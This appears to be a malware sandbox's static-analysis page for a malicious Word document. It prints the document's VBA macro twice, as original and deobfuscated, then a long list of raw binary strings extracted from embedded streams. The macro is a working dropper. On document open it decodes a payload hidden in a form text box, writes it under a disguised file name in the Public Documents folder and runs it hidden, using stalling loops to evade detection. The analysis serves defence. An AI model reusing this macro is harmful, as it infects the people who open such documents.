Static | ZeroBOX

Original


                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Function dddd(str As String) As String
    Dim out As String
    For counter = 1 To Len(str) Step 3
        out = out & Chr((Val(Mid(str, counter, 3))))
    Next
    'MsgBox (out)
    dddd = out
End Function

Function delay()
    
    Dim loop1 As Integer
    Dim aa As Integer
    
    loop1 = 100
    
    For tmp1 = 1 To loop1
        
        For tmp2 = 1 To loop1
        
            For tmp3 = 1 To loop1
        
                For tmp4 = 1 To loop1
                    aa = aa + 1
                Next
            
                aa = 0
                
            Next
            
        Next
        
    Next
    aa = 0
    
End Function

Function Run(path As String)
On Error GoTo erorr2
    Dim executablePath As String
    Dim command As String
    Dim windowStyle As Integer
    Dim waitOnReturn As Boolean
    Dim errorCode As Variant
    delay

    ' Specify the path to your executable
    executablePath = path
    
    ' Specify the command to be executed
    command = executablePath

    ' Specify window style (vbHide to minimize the window, but it might not fully detach)
    windowStyle = vbHide

    ' Specify whether to wait for the process to finish (optional)
    waitOnReturn = False
    delay

    ' Run the process
    errorCode = Shell(command, windowStyle)

    ' Optionally, wait for the process to finish


    ' Get the exit code of the process (optional)
    ' Note: This may not be accurate if the process is still running
    If errorCode <> 0 Then
        'MsgBox "Error Code: " & errorCode
    End If
erorr2:
'
End Function

Function FileExist(filePath As String) As Boolean

On Error GoTo erorr
    Dim fileSystem As Object
    Set fileSystem = CreateObject(dddd("083099114105112116105110103046070105108101083121115116101109079098106101099116"))
    
    If fileSystem.FileExists(filePath) Then
        FileExist = True
    Else
        FileExist = False
    
    End If
    
erorr:
    ' nothing
    
End Function

Private Sub Document_Open()

On Error GoTo erorr
    
    Dim exe_path As String
    Dim mal_path As String
    
    exe_path = "C:\\Users\\Public\\Documents\\MicrosoftWordUpdater.log"   'run it
    mal_path = "C:\\Users\\Public\\Documents\\ERORR Windows Reporting.exe"  'final maleware
    
    If FileExist(mal_path) Then      ' check file do not exist
        End
    End If
    
    delay
    
    Dim app As String
    app = dddd(UserForm1.TextBox1.Text)   ' malware use in (encode by python
    delay
    
    '''''''''''''''''''''''
    
    fileNumber = FreeFile
    Open exe_path For Output As fileNumber
            
    Print #fileNumber, app
    Close fileNumber
    
    Run (exe_path)

    delay
        
erorr:
    'MsgBox Err.Description
    ' nothing

End Sub



                                    

Deobfuscated


                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Function dddd(str As String) As String
    Dim out As String
    For counter = 1 To Len(str) Step 3
        out = out & Chr((Val(Mid(str, counter, 3))))
    Next
    'MsgBox (out)
    dddd = out
End Function

Function delay()
    
    Dim loop1 As Integer
    Dim aa As Integer
    
    loop1 = 100
    
    For tmp1 = 1 To loop1
        
        For tmp2 = 1 To loop1
        
            For tmp3 = 1 To loop1
        
                For tmp4 = 1 To loop1
                    aa = aa + 1
                Next
            
                aa = 0
                
            Next
            
        Next
        
    Next
    aa = 0
    
End Function

Function Run(path As String)
On Error GoTo erorr2
    Dim executablePath As String
    Dim command As String
    Dim windowStyle As Integer
    Dim waitOnReturn As Boolean
    Dim errorCode As Variant
    delay

    ' Specify the path to your executable
    executablePath = path
    
    ' Specify the command to be executed
    command = executablePath

    ' Specify window style (vbHide to minimize the window, but it might not fully detach)
    windowStyle = vbHide

    ' Specify whether to wait for the process to finish (optional)
    waitOnReturn = False
    delay

    ' Run the process
    errorCode = Shell(command, windowStyle)

    ' Optionally, wait for the process to finish


    ' Get the exit code of the process (optional)
    ' Note: This may not be accurate if the process is still running
    If errorCode <> 0 Then
        'MsgBox "Error Code: " & errorCode
    End If
erorr2:
'
End Function

Function FileExist(filePath As String) As Boolean

On Error GoTo erorr
    Dim fileSystem As Object
    Set fileSystem = CreateObject(dddd("083099114105112116105110103046070105108101083121115116101109079098106101099116"))
    
    If fileSystem.FileExists(filePath) Then
        FileExist = True
    Else
        FileExist = False
    
    End If
    
erorr:
    ' nothing
    
End Function

Private Sub Document_Open()

On Error GoTo erorr
    
    Dim exe_path As String
    Dim mal_path As String
    
    exe_path = "C:\\Users\\Public\\Documents\\MicrosoftWordUpdater.log"   'run it
    mal_path = "C:\\Users\\Public\\Documents\\ERORR Windows Reporting.exe"  'final maleware
    
    If FileExist(mal_path) Then      ' check file do not exist
        End
    End If
    
    delay
    
    Dim app As String
    app = dddd(UserForm1.TextBox1.Text)   ' malware use in (encode by python
    delay
    
    '''''''''''''''''''''''
    
    fileNumber = FreeFile
    Open exe_path For Output As fileNumber
            
    Print #fileNumber, app
    Close fileNumber
    
    Run (exe_path)

    delay
        
erorr:
    'MsgBox Err.Description
    ' nothing

End Sub



                                    

Original


                                        Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{914B01F4-60CD-47D0-A464-AECF76BB481C}{E2430283-34A1-4619-BC09-9DD2FAE6EB94}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

                                    

Deobfuscated


                                        Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{914B01F4-60CD-47D0-A464-AECF76BB481C}{E2430283-34A1-4619-BC09-9DD2FAE6EB94}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

                                    
CONTROL Forms.TextBox.1 \s
^Ql<~+
^Ql<~+
IDATx^
GsRgtPZ-
wt3?#*
}lk.^_
&6Q}XCm
0<i HH}
F~noN-
2Q|Xu)
j.__V'
V3*S"T
yTrt)<z
7x}u(
6q9]/]
BfZ']oh
Q r{}(
(HX}&*C
vL;;lV
i-nzj*
i/09<]
!4XmT!
Uc4mm_
<kuXT{
34?'b
!Z5f%esc
Y*RcJ*B
55&=Bx}L
U!HIaz
gT5&=Bf
!i10bE
P5'k:&m
Q*=BX.w
@bYfB3o
'`T0cT
"D|?X:
kEg$.U
PYN M{S%
1TueH[JWT!
+[{0MF
5hjy;7c
ww([;OH\
i7|Fc\
RSe*Q_
i"exUU
DU$JG[
H5NeZ8SKX
0B<B@C-
_H[5FS[j
r4l=L7!
GG5,UST
RPyh;]3;YIH
c8h4q{
(A4EFMzu
`CRc>n
8}9j{D0
!? 5f]
!0DSdD
ii5+U@A
if6Y)F
!]2&^j
f/%x),
G!B$<F
~,ih&=E
I7Ui"J
R.WU!
ZbN$`B
%+vn4y
JD]aem
U!QEFN
Q6'SU!
'B4<&K
?xy\(C4
/V!i8L
qwfkzy+
\[)B6,/
:g=y%lL!4
)"d#ZM
sEH[9&l
Q{#+-.
?{{= AP
5vBGv$1
%yeq_ B
TJ5$(J
CrwdbS+{
Q1#O:rCH
)vT=s!P
^\Lo^
kYS;qHBD
P=:c6}
4=B7/b~
f<t|Bn
^\^L/.%
;1fG!r
Wz-)x
8|W{#DT
(1h?6?
Yb9u(qj?)
km{0a{I
JbT!7d
X?F$H?7~xi
0{9Kwp
r+?FHB
-!%cSO
!>~~s9
_AVp2;3
cBJ>bl4k
z>@`BM
=G'cX{
hV9Qek
+%_i\z
~X$B2A
BO9u0Y
<?24&
$K}eac
S>UmH(*/
S d"Aj
M&FyB"
CB]F{)+-
@:Q}bEYT
<g:*Q=
'q~bl'x
6S^*_gr
SH\os#U
\!7,<&US:GD
BTN'%e
dR<0`S
SED<q+
3`mJc*Lk
[[P!.rB
6|/"B
-I]hL<
5 B0?L
9>7D)"j
<ZGs6m
g"B~/D
j0trMk
Uc5E3
A[|{'{
eg73M5cj
Iy~4!3H
tR=b!P
tR=b!P
tR=b!P
>7qM-!
|[ y66
>~VTMwkI}
G5Al]L
+)0m.O
e}xt'R
\=pv!D
>>,C
&FvgLoc-
^{$\A-}eH
A>?/??
?}~Y~jB
WM imt%
-!DE'm
B$0(e!
R/c.$+
!~GYi0
bb}R43
JYPZHm'[
W{op)E
Bt']5
z0rH$$
b*@Fie
F-6|nz
U?Hexi?n.
O7K<Q
E}lS2O
bH>7]Sw
wMH<hAi
X{_q}HT
x\><41
0YPut6
-28R[\
eHpQ0i
BT+cL)Q
IDATQ
O'9&j0
$RdjjL<>
*`j"L:#
uDVBHq
pX~x<.?~<.
y8.?~<.
]CYNf-qg
K#~&rc^I
6Qd6}l
[na|X.
<Sp5;_R
\'"j{LB
m2?tQ@w
iyznwik-
1ju'=D
HgZOu6
13=JM
Z!D-xN
i}hwU?~p1
BJ@)'@
B>~4!$
.c+`OC
m{b35fLgIA&
BH)F9t
UEd{jD
z>5&SFjjL
QEtUxR
.4%[,mf
51tfkq
sKA!Z#
vwOJQq9
_eiWqlM
}0^?zc
EnQXnX
tAD)2U
!Q?Dmu
`r]t7H
9S/u+[e
9-K+Bkb
9!GsCd
y6{D[c
C&r6#d
\^Vo!B
i1C=2O
\Fb;Rd
ACMp
~ykA{Y
rT=?HP1
r'+.vq
B\!f(vu!
5I>JP4(
NP^X H
h^o%;V
I@:*q
( v=(U
t{vGM3
+!$&ck
&&6f/Dk
x,]_S\
i1bVCV"$
a j{WOUQ
`")rrO
<~R^i,.[n
XgZDU;
g2~9q
[cNg&!
*B,kM!
~pKBeE
NEKk}G
dkjO\U0Z
Y!}v6\mi"
8'E$&N
{_O}q(s
&X<c13r
WfcDUG
hp/4H$L
Zl=Zs;
xE+B.<
s#GDHq
d>+Vh
r,T}]T
L -NKX
do!BhH
V)jik7T
axTW-
XQ0EO'
:]C17j
*B^dHT9W]
|6zK)%t"Dg}@]
&vG6 9
lg;!BbXo
"$TNT,
}!B,*R
>=YB-m
gQ]P"9
[8 BR"-
KAS~ 4
?wSnK}-*^
(SB1pt
+a(vy+
xjRj>2
r=ONl#
1|g@`+
9v-wgt
kM}Dr
mlMyN
N{D&Zr
&]zQrLT
N5ZDH3.3i
M)1!&.
eDfVhw
^{n-Z)w
Uwm;~^2
#|KDU*-I
=UqsX
WKc:9 &&
.A^{nJ
>ZI/at;
k)Bt"N
7P08)a
9T9 uag!
)+6F"Cf
(&_oYKc
0TF^(.@
AzC)bJ
CB==~&g/
yvt,4d
x{"Tog
B/T!N<@
?v#OJ>
e*Fh9a
_~\v[hO
q3(*Q$
_>~EbG
d$<yh+4m3
3o5z`(
2UGfKMz(
n}^l}=
7MbNq"
Z:"9(H+(4*yd
y0V/#e3
(e_KvW
`$z`|`
qt6b|i
4EO"dv
IDATAp
3(zhG$
jQ69cx
V~/ED5
8\$P{o
M`l4F{
K_~_dG
riL-{q
~qP#Po1
!N<us$6
t`ZSmA;
|8QQV\P
C!3{,-
d0[i!-
5W?l`c
r{$0s`
"pu=b/
B>_~.w
k+9R`S5
BF&)XlW
$B:AIS$
|_*d,0UE
J|n'|@
3s&rP{
7!J8n16a7I
IDAT%B
BID_>7.u
M(CP"c
1-HJI>
U,4>f!
(I>TiL'A
G 0KX`
9b8u>a&u
T"$q`f
1G ;TQI
<[WAtu
#sMaQMR
mcv=W-
>qpq2@
5Ob1'gYp
a{`83Q
-OYk]/
fjDA#q.
$jO_>H
RA@s_#
Q^:||&
Nyx)_,
vs@pKZ&3D
-}ELgs
72LKc.
`]T)C
GN"d6U
4]-H6%B
rb}%;5
{tIw)*2
B@2az
QFPU<J
U<w*B*4
S;-FT+
,Q%4$S
Q)iJ2ZD
N92Z1)h&
'na/j#
&9,Jd4
-h,)jG$
{Ds!
@Ln~BIK
CT1lbWG
!6(i.k
p;,JQ>
"o=|,H
IDATq]
+^TbDK_
$ExT.N
Z?Ef#C
h3$<3s
Lr@oT0h
0$v;yK0
zMB2a}
n]I90*9
k_|"9Nd
g7%H?Y
U!fIQ\
NZV9TI
KLG_Yub|
6uMGuK
(N1=~^
^*4G<F
5?9W,n
byY)a2
C*f,#yI
E^]E3<
|RR]"P
<6%#BUe
}<LDA]Pg
vy]?>7
OAV4B>Ij
`&s:*_k
pt<6r}
u_4RZ~
z'~}&>O
R~C%?w]p
uk@jMs
i?0ngU
|wc|3%
IDATx^
s;[,N/
Y_'0DA
kT})`M
w<nCzN
C@;JkIH
a]-Y\q
mhL&{8
rNP3&V
.UgV#'0
!e$Iu%
=uGJm:
50R'{eQ
C8EF5C
T3-9mi-
C#2y=&
wusD6L
D,u-%qI(
L5B(=F
pv%tM0
.n>*+[
z+ppe!
9%90r;
dutLgR
~3.LXh'
P_].73
s DtB$5
'z~f}P
)-&0B<
Di.*ZE@
eqUx43B
(DbM82
R-%F6<8
IDKq5
3D,-FK
RE(UReX,
=x'\#=C
F7g4Me
AH+DSed
yQVD;,4
lZ)sZX
aaPy\II
Wg;l:
1 DtBl
ZMr-o+
%m2){:
UY9LY!T9F
8lW`z`s
+ySo:!]d
-1An9%
0*3AnZ
4t!Llh{
;Q~jOkbV
s@Lu6o
3>4]&2@
i1$Jzl
CJAc0d
Sc^{B|
}?+j70
dW-.h}P
d7:0F2
PT9-`]@
\9sF9XZ
@Xua.M@H
;4p \c
sa."#K
I>SV40
dY<MjjX
$@*!ei3
]TO Bb3
xwHeSs
kKcjL!(
r1tZ=%
(5Lqec
-Elj;*
IDATZnp
AZJL1
;Pv^m>
i?cP]H
r!Gk:]MK
A`UR/R}V
Hc;3?,
q{4.-D2
ebmZ7%
Ric~%;
fJf5yv
|mp!C{
*z{WsL
C>~[z.>
DH%A@r
?&)RSh
f.//VD
s%-FT!
^"dR>W
xw0|hh
O+?}(=3~
>K|IZiv
ayxpUHI
OJxlAs
!$B>Ko
SUP! :
z|SBHZ
Pv|U"D
W}m BV
dHTQij
Zq&RkFEHU
4H;te1
%rflZI
q(yr>T&
%?.d'^^
5 Bp,3Wu?
Y0<BZ{B
^Q'!5F
W3TKw@:L
(Y$eu#EF
hjA%X@$
qBAMI]
T#l^yx
e}AJh5
v()HJ8
UAbUe4E
SKjL(B
*(N:XP
x[xiSM
RM)bet
=BP%D<B
M!Zp_c
=MCScT
9&RTPZW
RJFCT/
<Ht'^T$55
IDAT)Bv
='{.r}
Au"0Sc
A&W'B*
b>,0qU
!q2O,A
5 43I7I
=<$PtSN
f@P/Wd8[)d}
v_(eZ;vuHc
DX)a3)
!5&R7J
xrs^ok
X~R.y|6Hs
`4Y|+z
0!B4X
0@9ZWVH
'~>=W(:
|.''"@
(5Lo#A
s+BN<I
IDAT``
2w9:/p
N0FkiL
X)JtgI
Tl`%<|<
h=Jx1'i
/Ds#U!
^3fZJ8
[Rj%#2
g*Wl_6
5*QHD1v
RJcb1?
V>8RO%
$`"kvj
w`iL1QE
@]3+B`LK
{)Bp"H
BddZ6-
dkm[[%C
Ag[a3LE
61hVJh
X)?fs;_{
t`Gm4@
v[Ob>
;`<=e?
;&x}}
9a|Tn2
m8$^P]
peuRq>
KG]A/-HkG
kW(2,t
8^s2Fo
T>h"i;-
'JOJYJ
RU?SuQ1
toXt L
-ys)vU
HRdd 9
\q3oo}0
]~_]/?/
CD4D R
yUK^Jy
+mu/O}
!yVO(Y
d]0q7e
0v96<I
YMs0<>R
)JcjiX
yAq~8pp
~}CUH(e
8U:TAH
ODU^!
'DPU%~
)Adp*U
Twl}LP
o4Ke+E
jEj*#uPaY
9[MY1~d
Gf~| E
9d $@&U
zRS\n9
H~eC^5!
Jz.I.V
doPw-i
Aj5Vx(
1feC$Y
Xr}<^=0
26:VrX}faL
~-SgJ*
0Fz.*k
IjJR"@DoYX
IDAT!#
8WSKK_l
]|lHIP
LHdx/a
Z|{=pE
??GR)(
ITX+~y5
FXBZbS
B9Fj'
%aXivY
\IZvKnh6
ffXr``
hWfB7q
kFBi&F3B
NpfV+s
s~Vz,y4?|
eeGM_r
k&L#Le
eh$3D#
3\>t/O
JtSTOI
4Y{NwV
kW`W`W
Q.QpBtX
u-x]Vf
cnW`W`W
LipdX!
@H4Xfk
1Psd"4
O6I7k'i
E@HC,)
_C H^k
AdpP#m
*VH5v0-
yLA2uD
dio(S+P
/0A~xu
8k^'0P
X"fc/
|u-K@C-
d$HZ1#
|5hs1c
<K~>5^-
d!5_I$
@'2_hhi
bH[vbi
J!*`!Y
-#aSm?
F5~J1A3
Nr%\=1b
E@H0Bl
Er!2=${Q
KtTnIc Oxvqb
Y1J:9Jc
a;jhm2YL
!! BM5"E
x$&Fi8? %RM
]W4X8_
fe8S7Zn
oNE:20
3G41$)
3kW`W`W
|E30I+
`Ht3+0
$3F;fX
sW`W`*
uW`W`W
aW`W`W
#R<<>n
:sm1{
VO*W%*.n
!{"HQ_
wqqYb^
P8E*g%
V=/O:@
2\>O8{
)]%.:e
IDAT/[#
x.xdnN
y<y]uAob
m>%-GH{J
v<wFy?
>!HY2-'
9UHpwJ
=ijWI7
!)cHyG
CppW@N
_[rRuWJM
I4##Dc
]@Q>B9B
jksy3r-&!d
2<3"'d
e=xxkm[
#$BB}d
v*{H<+#D
< UcrsJL
|:["HNX)g
)=7bL
r&Hxhc
R$RKNL
4.8UP9}
,9nv<q
e*fmrIL
vbDp_7y7+
p}d[U^
$aIyJ-
Bj{skJ
.%^u;~
]\TwM}
E,WL;O
_|.a$D
jBK\Cs6H,
$s>R9p
/f!D"P
'oy#c[
VbSeFT
0qaCBH}/E
69&sA
iBGftD
>tFcn[
z]/?tlm
i_|V$Yn
sL%ya8
~n=t1k
W8J@;P9
K+H{1T-
[[a..B
mbUw=T
HvWD/n
('ddfd%
=$Zcfq
/&z\]>n.
Q+LgP"A;'
!5:7s(Z
U-8m_%H
K/4e!$
!_]#D8
JEYQ`w9
IDATx^
_jS3GOo_l
%%>K}^
10$Hd`
{Y[r`?90
93Hdd"
A~fIL(}K,
K~<zb!w
ABQ]/g
03965TW
|82VIf
IDAT{V
#r2ygP
$oY<>6f
EG-w9p
eh7<L`$
#D}L:/
0+HYq7
WAr+,)
\xE>hG
Fd_\O!E
Q DY+\
$6L<ql
x%C0?`^>
MO:"{/
VX *Aa
BHmb*U
IDAT]j
|VV.l8
8(%q[qb
?8{T&n
Y.NL[c6
h"/sX,
ZcsDVH
2RcMGY
HzczgQ
@~kk3E
a0DY kf
\,Ux!P
$2T9F+
iK:~Ow}
1Jl{d\
=Yg'7w
u6oR0R.
%Z>Ry[
K;,6|Dw
3f[B15
[C|-uV%3
.Xx=4Q
AaHec#'YQ
0@ZgNwV
70"ae$
@L_=<>F
(Xos H2
4 H0K(
ErTrT3'
c=Rzv]f
rHd0|17
J.Sn2Y
|V!F?7
!bMyEv
b]AB2Y
N(<<vCo
Nd$`vx#
IprlW2
y^cZ[?
"mASqa1
2_;Zb
;?~9fh
~<=?NOO
(/f?%8
IDATW:v
8=>=LO
Lm=ft
+@w:ycu
#|];bt?
wm;ixm
F/1_Wi
Miko2A$'H
>^NO'y
A"Ai05
>}^$y%
8s4~,t
H1Ke}$
\=~?`V
Ng$D=;
Cb4,fXr
R'Bn"aX
1Gd^(
tqu9]^^M
!Y}'9Ws
8l,_t1
/I&FeM$
bPlSn
7x&<+J
ts'/s^o
*+VnV@
B~(X"1
|x"T0s
g/hXjx
\LgZ-&
%K=GXL
DBbh'N
vTn$E~
DBb$VS
-GlX2f/
#9q4<L@A
kz86_|
\[+KG&
wOPfo@
IDATJTB4
@,Y!m@
kW<[~qjs+
$1A,%&J
K_qaTg
C2/\X3t6R
>!-Gep
.VFa~T
`jPn[V
3Xbgwu
jFMeV5
b?/y>o
+Sb@*2
z>}6V
''Kw|k_t
uy{5<h
tB,]F
^}}+{Fj
g3_xc/
g~ I~7
)2^^7tDn
)jo4s{
P.#u<E;?
)EfT-&iJ
5=$^XJ\
tg_5-\
O^Dn?Ew
2`/tZ >
*4^+C)tn
rfra[
~.[zV(
3woOiA
^ig`4U
{p'2v=
cGa>s:
j;|[K}
16x_.\
EiVO*S
7XBm07|Q
3W.#&Q@
2IEl.L
}$ 8d
2lJTm\
c+Ql#=H
Sh*Egg
*p=5XLI
I*A"{i
MkAFQ$
Crpjw}
4,bw{j
BGx5#J
IDAT1E
3nnIL1<
8'2.53
%=l,q.
umKYU@
OfL3AV
>|>(}D
N+A+^M
kp2pd\z
ApMu2L
ho=m)/
L(g(xS
6FECpq
430SGB\<X
S@HKbb<
;"w]ce&
XPh@7X
YO"UJD
]{poN*
s.NM.&3
8.@_t:G
THf~3A^
w~|A~h
n9Wyv,SB
h&F\X
P*CJ}1A
$j}];,s
{8)yaQJ
h*--4&
aKyAqK
}[:MPDue
`1AbvM
IDATy(~
VR5:#;
z{{+CT
'dQz/
JEw$1i
0O30 87j
Y%_M4V
Msf=%F
#-#Ii#
B2p\z?b
qt<s$D
u]T*7S<R/
+mOiHH
}:=mOO
jlaTE.;
iTGc!{~X*j
3'] r:
8RbR T
)1i,""
a_oYR`
z=MLOf
j0Vq5
Ra,H'JL
[qgR(t
*pWe_]h
}7t4x2
0}9}F_
06H:2J
um:0ec
d:L(aGJ
DO7fH~
\+'GNl
pHFB3A
EfQO(3
+5A~g:
0iCEJU
\z=m7h
&H2BTm#
cB{h?
%Ud0'd
(<AGK
uYRs5
n--F8lS
7Y?jt%
*d}1Rd
<QOEHVc
mW76j8
xv DFt
*BztUDb
Hd=P(/
*GuLy
:&b' R
H:C|f
YyP9k*ROn{O>
J4XQ~c
i[#]S"
@Xv8EQ
N8>%T;XD
R`n7E=
b+t<nX\
H3(0i
D HRa^,?
Tkc*@C
]|?2cZ<
70ty~B
qX G:Z
~O1RwOf
F-vb`)
)&HIb"
~,Sp}<l
s2`!i{a
-};Lbs
; HotN
y()LIb
VTG691
{Ur%-I
kJMdUh]br
d:a7n|Hx
9F{SlO
06FM$mt
$~ JWy
4d=mGJ
cILd7G
{3A0F}a&
-2G-vZ1
;gcaRn
rI<ngN
1A:"7l
R\j6X[
:jhCSC2
sJ@+@
1j3AZv
']"rK&a
Ib6{FEAJ
*P%G-)^
73_W4v=o
@N9L{7,
JqY0A*rK
&}58zN
R Hd<u
06.w"_
"4]=qb
}wr~aY
-APBLRb
T{r|3D
F\/r<A
.9LX f2
%S(o@d
?~(^c|
p&:p=\0
zfRl&H
(nf]%!
!rX.:
x{KIjz/
+k3[`z
*FHKHLo
/*&7r
x&aK*3
($"w$k'
2&|]iY0
"r+:\
<wo:5y<.
`k6Ae4
F;'#$y3
tCJd`"!
vNwskh
bzhX_f
DVvF}{
1S>Wu~P6{s
^+9#;`
Iz3ABI
X3cPG4-
k=G2F}
01FU:L
~]M^%
hXCo?<A\
e1.,;m
ShycgQ
Y HQ<?UJ
:n@!i*
Ld.@H6q
0a1]"r
hjf&em
X ;"7`O
KV#'s?^
TDn1A0F
;SPMBIEx
_KzR@^@
hyD:Fr
tr<q3A
Y3A>U2L
$s0A0G
7 HK:ID
EArJ]#Ku
IDATe4C0,
"ZI.YL
BW!oYL
<<%Qrj
ES|@\L
)9LQnC
.2GzyN
OqD<.L
fPdb/9L
fK<[,#
UgSs4u
I1'5:L
?MiX \wG
5o`RvR
}}zZk0
C&Zr7b.
$)D*Nr
8yq:W
"Cf1Aj
B:U%~!
]_q&~n},fy
~)fU01'
*FL<Aj
Y1m-C^
+`H3A\,9Jo@
ZObpi
@8v7)I
?RZvU2
ZiJ?$U
DE{1A:Uh
:r1AdP^
cqgKl?
{k|f~}gp
!W3n@a
I YI$j
N@dIGl
#=X,^C
"_ KQ9s;A)
*u{{HU6
rTGm}v
0R{$>p
5]#rkMm
4=4@9p
4mj0kL:
T?<-frn
Dn$P-`
*!nv<B
q\N~1he
0@$$Sr@
!uO0Fm
r]JusM_
=7#dKN
LWUpC<W
;gI|Zf
HRk<xI
YT^ ^W
WOQwBIV>F
LpRbH#
k|)H)I\eX
06EUtpM
6sd*c~L
Hb0H}d
e7x\lf
HH%I*NO{
8Pa{Ni
,C@y"8
RH$3s`
rk&HI]
&FnLsX
`o0mof
.oILR2
<$"h%94
=O_,_2
~1?` h
`1+~$2s>
_e0Y Hd
s}^s^4
t<-ZtM
N|yz*S
o)N@*dG-
f}Dc|0Y
/1A~i&
.*7@H?
huSMld
Z. HKG%
Z7Lk:r
-%:&bM
Qy}nXJ
V<gW|I
@oKRN aX8
q[T^e1
>"EU6+
${8c&H
gclY@H
}M/3D/
%5,r_*
'caG4fS
=SX3?&&W
*672,W
aP8]b{
iBFcgm
a!S7a+
S@JM
\K^jJ/
<[bUE*l
5R|!#0
YZ0{#I
4F}||P:
mM%NO|
b|<KJR
~pS(YI
Dde3C.,
0`&)bd
f`"m6E
IN" !@
jr,)QC
fTx:l9I
%%0Yh~
<AtN/&H
ZfObm
( $Qo:
9kX;-]
&ILIa~+
AjjU{[
3K3?#u
bcvcNr
JXSR*
)g{SY#
11[jZT@
V#K<1,
1FU,jju
~=@HJQ
$nM.qU#
6EKal0
}2xbvM@
b)L1A,
R"DQmS
b<?7u'
,0$FK~
&Hy'8.
Hbl(j&
"t+JWL
M[W7MSO
)UB0A
x2'9LLV
y*&HI`
IDAT1CU
byK<n$
)1_$){
9C<z8~&
j(#sh4
)/YwL7v
fc~o1/
B|0'n5R
,&HKb"
lwJOvv`
22\S?7
4mu]D%
h]_"ca&
&b'\M<n
uQ\+R
}=3Ha0
tD.m7{
3#kbr5
yQ HIb~
,:Y5B_n
?g43L%K
g,&HERw4z
BeI7`"
RT@1A>
R>&_{5
L^_.Z-
dO\ Hb
mL?/4:
$J5:r@
H{m56K
A>6(Z@
<1`byv
>~v{\IQ?<
$\I(=D[
*=@kFpK
2or1qtG
ezIS
8X {p
-x$B#aw
}\7i[r
EKatf4
$fN(r}
)LW`m1O
Mg3x,{A
S=SDS p
HcdbTa
zb3@Fv
~TaSZ_
kjc^Oz
*c*L}j
IDATSy
!_|4nzzZ
Uz;Ypl
Js"y-z
/a;`dk
VOa{LSu
HZW_Ck
^ZL<z
IHpQ;I_f
yg#HX
2GU12
=pXG^3<7
o0BB9Wc
6o.S>K`
DqW:L@
|emr1]
FQL@9p
~4 R^
d%0*rolST%
B: H3(H
z]Hb`
X`GIb,
Y!>#cP
&V(mc
TklKa:
!dyB$U
]e4E*I(
D)]i1W#P
$J*PD4
x<\"re
z6e|X7
R_0n^.
hb,&NE
0A8cjay
F~&6Fm
e-HaRG
NkbLQ=
%"Wr$5A
MT}}>^
8o3> L
IDAT.1
CIa>iZb-
;cb87?7V
2q=}Az.}
iz-} V
DRFS!?
7[5abRT
Bk<<2&
K7Rnr(
L[8txQ
'H1@0!
,$$1fh
o-`dX
>'GJk?0jv
c<%1=!
b#qej;|
$1wwoow?@
4&ONH:
@21is+
AVsp5E
0tX~[L
}]. HL{
_H3ABOn
k=?du+mf
s$o-M1
N?q,.L
9a3T{U
s\ H3pZ
>\{.@H
Y%cPI3e
)kIZ+_
q`A5s
D#ifE]
cOnsT8
HQIrHK'
IUpaZ
i%{8`q
q3x=mSd
a!Kf4a
9L1A>=
xT2LKab
e0WS}R=
HjJRt8
l&fj33A&.
+}3i4m8}6
I3?NPd_
Adp{2A
xj8Ao6
jj=?3`D
H^9SX6
\PYt]a
C846@k]f|B\
=0d5l>gb
&)7`Lf`
FhMDS$
"e8|48
4#$`|@s52
mmTYZjC
S|ZE-ti5
KTOE3.@
?y>WF2
m.?7h0
Y%1,LB
IDATc-
f-h:N`
8 HW$]
7Y1]r*Z
13"6cpD
|50mi:
FZfHz(y['
XbkN*Z
gMa/#JD
zoX<AXa
P|DCo3
}{{EST
1nxbtd
wH{jd#
R H}< H
2FUl.d
Hxq,
Ta'zoG
"tA>E:].
dxMv}
S H1AJ
nV],}
cMcaxl
k3M2w
6{\YvZB
V$uQzlo
XCa^Y
ma&H=k
5bh0DA
jw"KojU
6@qd=?d
:w}:t|
8~l1F-
IST68d|
f6EfkAo
K2Al(4
J^ob'pMVDp
)k:fy]>7
6x#m_nd
$P,5me
ST-8f9
5=0Kcj|
jnK.DVHKbB
Ycu=/`
=utD.@
DUe3TO
HjYi\g
Ano?mw
IDATkd]c
as#KBlJH
iST>c2
bffSgi
$&Sb@q
@=vNo
Sn`FKD
7;JNhDj
NVjIO
>n7?l77
ky~\^A
64ab.)
`3Typ`
XF@2Fm&
QZv5v=)3e
a s)FP
cT0F&"
h",cD{
a2L3AX
6Hu?&O
L_D4wy
IDATONA8
!aFf*?
+yd40,0j
cLi7]o
z/}>LQ
e79>V<n
uyRxhs
CqX B|
- I%ID
@V6H>[9%
(@$2A5
+Wrs&<
8|+8-;
e&+yL
+cTU 0
22V3/o
KZdv}R
8uh2tt
h"Q4)RO
IDAT:)
j{P$"w
5q]cd=K>R
uAdA8&
l")6H\
ysL3T{*
*LXQBL
ZTX(z2
K|@po5
@nh*yk#
DQf`SSk
*+&H&6{CT
jf9Mrq
b&H(k1
5BCr2&
1_pD)fb5
7%2<^
m4Y~If
A>}Bl8<
^QGwzL
2%0-{Yg{a
f;;WT.
(Zc&7k
Q&z1AJ
s3@Y<A~$
$5:~2E
<;!F~
)6H3N5
D%u9Qw
uFteLZc
$,3A6y
rL[E~W
u1bcT5)0
b1Ah0J
EMYn1A
ARF$1
V Hd_Y
cP0W3@
XMjdS{
Se^G),S
hLO["S
"DP8DR
Kf]u@T9
>!>KvM
<>Mgb"
H202~P
ykR/Cp
R4=IeT
*W?'^v
JWB%]3
y6v]3>
or^P<X
>~m?z(
FWPq>{;
Lr=jr?
Ucu=hy
920UpM6
IDATN&9
]#E%KPbi
v*hi"{
Ey^gea
U{<l,
(+uS+W
&\YPu!
